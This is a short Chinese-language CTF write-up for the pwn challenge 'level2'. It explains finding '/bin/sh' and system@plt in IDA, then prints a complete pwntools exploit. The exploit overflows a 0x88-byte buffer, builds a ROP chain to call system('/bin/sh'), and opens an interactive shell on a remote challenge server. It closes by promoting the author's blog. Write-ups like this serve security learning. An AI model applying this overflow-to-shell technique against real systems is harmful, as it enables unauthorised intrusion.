level2
可以看到题上已经有提示了(ROP)
我们看一下程序的保护状态和它的运行情况
开了NX,问题不大。运行可以发现有一个输入点
放IDA里看看
在字符串窗口可以发现有**/bin/sh**,并且左边的函数窗口可以看到在 .plt 段有system 函数
这就很舒服了呀,再结合一下题目给的提示,构造ROP链就行,效果如下:
具体EXP如下:
from pwn import *
#context.log_level = 'debug'
r = remote("111.198.29.45", 49673)
bin_sh = 0x0804A024
system = 0x08048320
r.recvuntil("Input:\n")
payload = 'a'*(0x88) + 'a' * 4 + p32(system) + p32(0) + p32(bin_sh)
r.send(payload)
r.interactive()
写payload的时候要注意一个问题:
所以在函数地址后面首先要去覆盖它的返回地址
over
最后放一下我的博客(www.buryia.top),有兴趣的可以来看看(萌新的小天地,大
佬们轻点喷)